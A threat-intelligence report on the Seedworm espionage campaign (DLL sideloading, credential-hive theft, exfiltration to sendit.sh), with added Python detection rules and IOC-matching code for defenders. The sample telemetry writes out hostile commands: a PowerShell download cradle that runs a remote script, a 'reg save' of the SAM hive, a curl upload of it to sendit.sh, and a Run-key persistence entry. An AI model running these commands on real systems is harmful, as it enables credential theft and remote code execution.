Seedworm Espionage Campaign Against Electronics Manufacturers: Credential Theft, DLL Sideloading, and Covert Exfiltration
Seedworm, an Iran-aligned threat actor tracked under aliases including MERCURY, MuddyWater, TEMP.Zagros, and Static Kitten, has been observed conducting a broad espionage campaign that reached 9 organizations across 9 countries in Q1 2026 alone. Confirmed victims include government agencies and an international airport in the Middle East, electronics and industrial manufacturers in Southeast Asia and South Korea, a financial services provider in Latin America, and education, public-sector, and professional services organizations across multiple regions. First detected in February 2026, the intrusion chain reflects a notable tradecraft evolution toward quieter, more disciplined operations: Node.js scripts now sit in front of PowerShell so that the orchestration logic stays outside script-block logging (the PowerShell stages they spawn are still logged, and node.exe as the parent of powershell.exe is itself a strong detection signal), and multiple credential-theft tools are deployed so that blocking any single binary does not halt the operation.
Initial execution is orchestrated through Node.js scripts that invoke PowerShell download cradles to fetch secondary payloads from a hard-coded staging IP and from a second attacker-owned domain, giving the operator two independent fetch channels. The group drops malicious DLLs alongside legitimate, signed binaries from vendors such as Fortemedia and SentinelOne and relies on DLL search-order hijacking (sideloading) so that the implant runs inside a trusted, signed process. Because the host binary itself is clean, detection has to key on its context rather than its signature: the process that launched it and a DLL loaded from the binary's own directory rather than from System32. Persistence is established via a Run registry key pointing at the sideloaded payload, and a dedicated proxy tool provides a covert relay channel back to attacker-controlled infrastructure.
Seedworm conducts systematic reconnaissance before lateral movement: operators run whoami, ipconfig and net commands and query the root\SecurityCenter2 WMI namespace (the namespace in which Windows registers installed antivirus and firewall products) to enumerate users, domain groups, and installed security products. Credential material, namely offline copies of the SAM, SECURITY, and SYSTEM registry hives (from which local account hashes and LSA secrets can be recovered) together with browser profile credential stores, is staged in the Windows Temp directory and exfiltrated with curl multipart form uploads (-F) to the public file-sharing service sendit.sh. The detection list below indicates that the browser theft involves Chrome's App-Bound Encryption tooling and a remote thread created in the browser process, that is, decrypting the stores from inside the browser rather than reading them offline. The use of anonymous file-transfer infrastructure and legitimate signed binaries reflects a deliberate effort to blend into normal endpoint activity.
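The behaviours in the two paragraphs above map directly onto the detection names listed further down the page. As an added example (not code from the source report or from any vendor), the following Python runs a handful of those checks over constructed process-creation events shaped like Sysmon Event ID 1 records. The events, the paths, the placeholder sideload host `host.exe`, its vendor string and the sendit.sh upload path are assumptions made for illustration; only the command-line patterns (node.exe parenting powershell.exe, the root\SecurityCenter2 query, reg.exe Run-key and hive operations, curl -F to sendit.sh) come from the report.

```python
# Added example, not from the source report: a small detection pass over
# constructed process-creation events mirroring the Seedworm chain.
# Field names loosely follow Sysmon Event ID 1 (image, parent_image,
# command_line, company). Every event below is constructed; "host.exe",
# its Company string and the sendit.sh path are placeholders.
import re
from urllib.parse import urlparse

# Vendors whose signed binaries the report names as sideload hosts.
SIDELOAD_HOST_VENDORS = ("fortemedia", "sentinelone")
# Anonymous file-sharing services used for exfiltration in this campaign.
EXFIL_SERVICES = ("sendit.sh",)

CRADLE_RE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\birm\b|net\.webclient", re.I)
SECURITY_CENTER_RE = re.compile(r"securitycenter2?\b", re.I)   # root\SecurityCenter2
RUN_KEY_RE = re.compile(r"\\currentversion\\run(once)?\b", re.I)
HIVE_RE = re.compile(r"\bhklm\\(sam|security|system)\b", re.I)
ARG_RE = re.compile(r'"[^"]*"|\S+')   # split a command line, keeping quoted args whole


def base_name(image: str) -> str:
    """Lower-case file name of an image path, tolerating either slash."""
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def argv_of(command_line: str) -> list:
    return [a.strip('"') for a in ARG_RE.findall(command_line)]


def node_powershell_cradle(ev: dict) -> bool:
    """powershell.exe started by node.exe with a download cradle on the command line."""
    return (base_name(ev["parent_image"]) == "node.exe"
            and base_name(ev["image"]) in ("powershell.exe", "pwsh.exe")
            and bool(CRADLE_RE.search(ev["command_line"])))


def vendor_binary_from_node(ev: dict) -> bool:
    """A security/driver vendor's binary launched by node.exe: the sideload host."""
    company = ev.get("company", "").lower()
    return (base_name(ev["parent_image"]) == "node.exe"
            and any(v in company for v in SIDELOAD_HOST_VENDORS))


def wmi_security_center_discovery(ev: dict) -> bool:
    """wmic or PowerShell CIM/WMI query against the SecurityCenter2 namespace."""
    return bool(SECURITY_CENTER_RE.search(ev["command_line"]))


def reg_run_key_persistence(ev: dict) -> bool:
    cl = ev["command_line"]
    return (base_name(ev["image"]) == "reg.exe"
            and bool(re.search(r"\badd\b", cl, re.I)) and bool(RUN_KEY_RE.search(cl)))


def reg_hive_dump(ev: dict) -> bool:
    cl = ev["command_line"]
    return (base_name(ev["image"]) == "reg.exe"
            and bool(re.search(r"\bsave\b", cl, re.I)) and bool(HIVE_RE.search(cl)))


def curl_multipart_exfil(ev: dict) -> bool:
    """curl with a multipart form upload (-F/--form) to a listed sharing service."""
    if base_name(ev["image"]) != "curl.exe":
        return False
    argv = argv_of(ev["command_line"])
    has_form = any(a in ("-F", "--form") or a.startswith("--form=") for a in argv)
    hosts = [(urlparse(a).hostname or "").lower()
             for a in argv if a.startswith(("http://", "https://"))]
    return has_form and any(h == s or h.endswith("." + s)
                            for h in hosts for s in EXFIL_SERVICES)


RULES = [
    ("node_powershell_cradle", node_powershell_cradle),
    ("vendor_binary_from_node", vendor_binary_from_node),
    ("wmi_security_center_discovery", wmi_security_center_discovery),
    ("reg_run_key_persistence", reg_run_key_persistence),
    ("reg_hive_dump", reg_hive_dump),
    ("curl_multipart_exfil", curl_multipart_exfil),
]


def evaluate(events):
    """Return (rule_name, event_id) for every rule that fires on every event."""
    return [(name, ev["id"]) for ev in events for name, rule in RULES if rule(ev)]


NODE = r"C:\Program Files\nodejs\node.exe"
SAMPLE_EVENTS = [   # constructed telemetry
    {"id": 1, "parent_image": NODE,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": 'powershell.exe -nop -w hidden -c "IEX (New-Object Net.WebClient)'
                     '.DownloadString(\'http://179.43.177.220:8080/nm.ps1\')"'},
    {"id": 2, "parent_image": NODE, "image": r"C:\Users\Public\Update\host.exe",
     "company": "SentinelOne, Inc.", "command_line": "host.exe"},   # placeholder signer
    {"id": 3, "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "command_line": r"wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get displayName"},
    {"id": 4, "parent_image": NODE, "image": r"C:\Windows\System32\reg.exe",
     "command_line": r'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater'
                     r' /t REG_SZ /d "C:\Users\Public\Update\host.exe"'},
    {"id": 5, "parent_image": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\reg.exe",
     "command_line": r"reg save HKLM\SAM C:\Windows\Temp\sam.hiv"},
    {"id": 6, "parent_image": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\curl.exe",
     "command_line": r'curl.exe -F "file=@C:\Windows\Temp\sam.hiv" https://sendit.sh/upload'},
    # Benign controls: no rule should fire on these two.
    {"id": 7, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe Get-Process | Sort-Object CPU"},
    {"id": 8, "parent_image": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\curl.exe",
     "command_line": "curl.exe -o update.zip https://downloads.example.com/update.zip"},
]

if __name__ == "__main__":
    for rule_name, event_id in evaluate(SAMPLE_EVENTS):
        print(f"event {event_id}: {rule_name}")
```

A production rule would take signer identity from the EDR's signature fields rather than the PE Company string, and would key the exfiltration rule on the destination host seen by the proxy as well as the command line, since the upload target can be supplied to curl from a config file.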
IOCs (16)

IP ADDRESS (3)
- 179.43.177.220
- 178.128.233.36
- 37.187.78.41

DOMAIN (2)
- timetrakr.cloud
- svc.wompworthy.com

SHA256 FILE HASH (7)
- d587959841a763669279ad831b8f0379f6a7b037dffc19deab5d41f37f8b5ffc
- 74ab3838ebed7054b2254bf7d334c80c8b2cfec4a97d1706723f8ea55f11061f
- c6182fd01b14d84723e3c9d11bc0e16b34de6607ccb8334fc9bb97c1b44f0cde
- 0c9b911935a3705b0ad569446804d80026feb6db3884aeb240b6c76e9b8cf139
- 3ee7dab4ae4f6d4f16dfabb6f38faef370411a9fc00ff035844e54703b99600a
- bee79c3302b1a7afc0952842d14eff83a604ef00bfdae525176c16c80b2045f7
- b21c802775df0c0d82c8cfde299084abc624898b10258db641b820172a0ba29a
URL (4)
- http://179.43.177.220:8080/nm.ps1
- http://179.43.177.220:8080/a.dat
- http://179.43.177.220:8080/a.exe
- https://timetrakr.cloud/sp.ps1

Detections (9)
- Security Vendor Binary Spawned by Node.js
- Process Connection to Chrome App-Bound Encryption Tool Repository
- PowerShell Reconnaissance Spawned by Node.js
- Security Product Discovery Via WMI SecurityCenter Namespace
- Potential Persistence Attempt Via Run Keys Using Reg.EXE
- Credential Dialog Spoofing via CredUIPromptForWindowsCredentialsW
- Remote Thread Creation Targeting a Browser Process
- Non-Browser Process Opening Browser Credential Database Files
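Applying the IOC list above to telemetry, as an added example that is not part of the source page: the indicator values are copied from the list; the proxy log lines, client addresses, timestamps and the subdomain cdn.timetrakr.cloud are constructed. Two details matter in practice and are handled here: a URL IOC's host may carry a port (179.43.177.220:8080), so matching is done on the parsed hostname as well as on the full URL, and a domain IOC must also match its subdomains without matching look-alike domains that merely end in the same string.

```python
# Added example, not part of the source page: matching the IOC list above
# against constructed proxy-log lines and file hashes. IOC values are copied
# from the list; log lines, client addresses, timestamps and the
# cdn.timetrakr.cloud subdomain are constructed for illustration.
import ipaddress
import re
from urllib.parse import urlparse

IOC_IPS = {"179.43.177.220", "178.128.233.36", "37.187.78.41"}
IOC_DOMAINS = {"timetrakr.cloud", "svc.wompworthy.com"}
IOC_URLS = {
    "http://179.43.177.220:8080/nm.ps1",
    "http://179.43.177.220:8080/a.dat",
    "http://179.43.177.220:8080/a.exe",
    "https://timetrakr.cloud/sp.ps1",
}
IOC_SHA256 = {
    "d587959841a763669279ad831b8f0379f6a7b037dffc19deab5d41f37f8b5ffc",
    "74ab3838ebed7054b2254bf7d334c80c8b2cfec4a97d1706723f8ea55f11061f",
    "c6182fd01b14d84723e3c9d11bc0e16b34de6607ccb8334fc9bb97c1b44f0cde",
    "0c9b911935a3705b0ad569446804d80026feb6db3884aeb240b6c76e9b8cf139",
    "3ee7dab4ae4f6d4f16dfabb6f38faef370411a9fc00ff035844e54703b99600a",
    "bee79c3302b1a7afc0952842d14eff83a604ef00bfdae525176c16c80b2045f7",
    "b21c802775df0c0d82c8cfde299084abc624898b10258db641b820172a0ba29a",
}
SHA256_RE = re.compile(r"^[0-9a-f]{64}$")


def validate_iocs() -> bool:
    """Catch copy/paste damage (merged hashes, bad octets) before the list is deployed."""
    for ip in IOC_IPS:
        ipaddress.ip_address(ip)            # raises ValueError on a malformed address
    for h in IOC_SHA256:
        if not SHA256_RE.match(h):
            raise ValueError(f"bad SHA256 indicator: {h}")
    for u in IOC_URLS:
        if not urlparse(u).hostname:
            raise ValueError(f"bad URL indicator: {u}")
    return True


def normalize_host(host: str) -> str:
    return host.strip().lower().rstrip(".")   # case-fold, drop trailing dot


def match_host(host: str):
    """Exact IP match, or the listed domain itself / any subdomain of it."""
    host = normalize_host(host)
    if host in IOC_IPS:
        return ("ip", host)
    for d in IOC_DOMAINS:
        # endswith("." + d), not endswith(d): notsvc.wompworthy.com must not match.
        if host == d or host.endswith("." + d):
            return ("domain", d)
    return None


def match_url(url: str):
    url = url.strip()
    if url in IOC_URLS:
        return ("url", url)
    host = urlparse(url).hostname           # scheme, port and path stripped
    return match_host(host) if host else None


def match_hash(digest: str):
    digest = digest.strip().lower()
    return ("sha256", digest) if digest in IOC_SHA256 else None


# Constructed proxy log: "<timestamp> <client> <method> <url> <status>"
SAMPLE_PROXY_LOG = [
    "2026-02-14T09:12:03Z 10.0.0.15 GET http://179.43.177.220:8080/a.exe 200",
    "2026-02-14T09:12:09Z 10.0.0.15 GET http://179.43.177.220:8080/ 404",
    "2026-02-14T09:15:41Z 10.0.0.22 GET https://cdn.timetrakr.cloud/u.js 200",
    "2026-02-14T09:16:02Z 10.0.0.9 GET https://www.example.com/ 200",
    "2026-02-14T09:20:17Z 10.0.0.31 POST https://178.128.233.36:443/ 200",
    "2026-02-14T09:21:00Z 10.0.0.40 GET https://notsvc.wompworthy.com/ 200",
]


def scan_proxy_log(lines):
    """Return (client, url, match) for each line whose URL or host is an indicator."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) < 4:
            continue
        m = match_url(fields[3])
        if m:
            hits.append((fields[1], fields[3], m))
    return hits


if __name__ == "__main__":
    validate_iocs()
    for client, url, m in scan_proxy_log(SAMPLE_PROXY_LOG):
        print(f"{client} -> {url}  [{m[0]}: {m[1]}]")
```

The second log line shows why host matching is needed alongside URL matching: a request to the staging server's root is not one of the four listed URLs, but its host is a listed IP. The last line is the look-alike check; a naive endswith on the domain string would flag it.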